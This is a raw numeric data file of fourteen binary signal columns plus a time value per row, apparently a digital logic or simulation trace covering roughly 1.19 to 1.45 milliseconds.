1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1910440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1910680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1910920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1911200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1911440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1911720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1911960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1912200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1912440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1912680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1912920e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1913200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1913440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1913720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1913960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1914200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1914440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1914680e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1914960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1915240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1915480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1915720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1915960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1916200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1916440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1916720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1916960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1917240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1917480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1917720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1917960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1918200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1918440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1918720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1918960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1919240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1919480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1919720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1919960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1920200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1920440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1920720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1920960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1921240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1921480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1921720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1921960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1922200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1922440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1922720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1922960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1923240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1923480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1923720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1923960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1924200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1924440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1924720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1924960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1925240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1925480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1925720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1925960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1926200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1926440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1926720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1926960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1927240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1927480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1927720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1927960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1928200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1928440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1928720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1928960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1929240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1929480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1929720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1929960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1930200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1930440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1930720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1930960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1931240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1931480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1931720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1931960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1932200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1932440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1932720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1932960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1933240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1933480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1933720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1933960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1934200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1934440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1934720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1934960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1935240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1935480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1935720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1935960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1936200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1936440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1936720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1936960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1937240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1937480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1937720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1937960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1938200e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1938440e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1938720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1938960e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1939240e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1939480e-03 1,0,0,1,1,0,0,0,0,0,0,0,1,0,1.1939720e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,0,1.1939960e-03 1,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3188480e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.3190200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3190440e-03 0,1,0,1,1,0,0,0,0,0,0,1,0,1,1.3190600e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3190840e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3193720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3193960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3194440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3194680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3194920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3195200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3195440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3195720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3195960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.3196200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,1,1.3196680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3196800e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3196920e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3197200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3197440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3197960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3198200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3198440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3198680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3198920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3199200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3199440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3199720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3199960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3200200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3200680e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3200920e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3201200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3201440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3201960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3202200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3202440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3202680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3203200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3203480e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3203960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3204200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3204680e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3204960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3205200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3205440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3205720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3205960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3206200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3206440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3206960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3207200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3207720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3207960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3208440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3208680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3208960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3209200e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3209240e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3209720e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3209960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3210040e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3210200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3210440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3210680e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3210920e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3211200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3211440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3211720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3211960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3212440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3212680e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3212760e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3212920e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3213200e-03 0,1,0,1,1,1,0,0,0,0,0,0,0,0,1.3213240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3213280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3213440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3213720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3213960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3214200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3214680e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3214960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3215200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3215440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3215960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3216200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3216680e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3216960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3217480e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3217720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3217960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3218200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3218440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3218680e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3218760e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3219200e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3219480e-03 0,1,0,1,1,1,0,0,0,0,0,0,0,0,1.3219520e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3219560e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3219720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3219960e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3220440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3220680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3221200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3221400e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3221920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3222200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3222440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3222680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3222920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3223160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3223400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3223720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3224200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3224440e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3224480e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3224680e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3224920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3225000e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3225160e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3225400e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3225480e-03 0,1,0,1,1,1,0,0,0,1,0,0,1,0,1.3225960e-03 0,1,0,1,1,1,0,0,0,1,0,0,0,0,1.3226200e-03 0,1,0,1,1,1,0,0,0,0,0,0,0,0,1.3226240e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3226280e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3226440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3226680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3226920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3227160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3227720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3227920e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3228200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3228440e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3228920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3229160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3229720e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3229920e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3230440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3230680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3230920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3231160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3231400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3231720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3231920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3232200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3232440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3232680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3232920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3233160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3233400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3233720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3233920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3234200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3234440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3234680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3234920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3235160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3235400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3235720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3235920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3236200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3236440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3236680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3236920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3237160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3237400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3237720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3237920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3238200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3238440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3238680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3238920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3239160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3239400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3239720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3239920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3240200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3240440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3240680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3240920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3241160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3241400e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3241720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3241920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3242200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3242440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3242680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3242920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3243160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3243440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3243720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3243960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3244200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3244440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3244680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3244920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3245200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3245440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3245720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3245960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3246200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3246440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3246680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3246920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3247200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3247440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3247720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3247960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3248200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3248440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3248680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3248920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3249200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3249440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3249720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3249960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3250200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3250440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3250680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3250920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3251200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3251440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3251720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3251960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3252200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3252440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3252680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3252920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3253200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3253440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3253720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3253960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3254200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3254440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3254680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3254920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3255200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3255440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3255720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3255960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3256200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3256440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3256680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3256920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3257200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3257440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3257720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3257960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3258200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3258440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3258680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3258920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3259200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3259440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3259720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3259960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3260200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3260440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3260680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3260920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3261160e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3261440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3261720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3261960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3262200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3262440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3262680e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3262920e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3263200e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3263440e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3263720e-03 0,1,0,1,1,0,0,0,0,0,0,0,1,0,1.3263960e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,0,1.3264200e-03 0,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4507520e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4509200e-03 1,1,0,1,1,0,0,0,0,0,0,1,0,1,1.4509400e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4509640e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.4512480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4512720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.4512760e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,1,1.4513240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.4513480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4513560e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.4513720e-03 